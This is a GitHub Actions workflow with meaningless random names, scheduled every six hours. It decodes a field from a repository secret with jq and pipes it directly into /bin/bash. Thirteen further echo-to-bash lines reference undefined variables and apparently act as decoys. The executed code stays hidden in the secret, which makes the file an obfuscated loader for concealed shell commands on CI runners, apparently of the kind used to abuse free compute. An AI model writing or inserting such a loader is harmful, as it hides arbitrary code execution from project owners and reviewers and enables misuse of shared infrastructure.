name: pojianshisi

on:
  workflow_dispatch:
  schedule:
    - cron: '37 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pojianshisi
        env:
          zglih632: ${{ secrets.zglih632 }}
        run: |
          echo $zglih632 | jq -r .wcdn3 | /bin/bash
          echo $sx19690 | jq -r .bnuwz3 | /bin/bash
          echo $mv06 | jq -r .rc9 | /bin/bash
          echo $jooq59 | jq -r .gncb025 | /bin/bash
          echo $b1240 | jq -r .d5881 | /bin/bash
          echo $g4 | jq -r .libpj0935 | /bin/bash
          echo $e5707 | jq -r .gmfq561 | /bin/bash
          echo $pjh21741 | jq -r .ukw33408 | /bin/bash
          echo $qfaj620 | jq -r .cgn7970 | /bin/bash
          echo $uvz366 | jq -r .kyfeg3294 | /bin/bash
          echo $g72 | jq -r .mgo84 | /bin/bash
          echo $nyqvo5126 | jq -r .inz1409 | /bin/bash
          echo $xzviq84 | jq -r .i1 | /bin/bash
          echo $q4161 | jq -r .hxsht7535 | /bin/bash

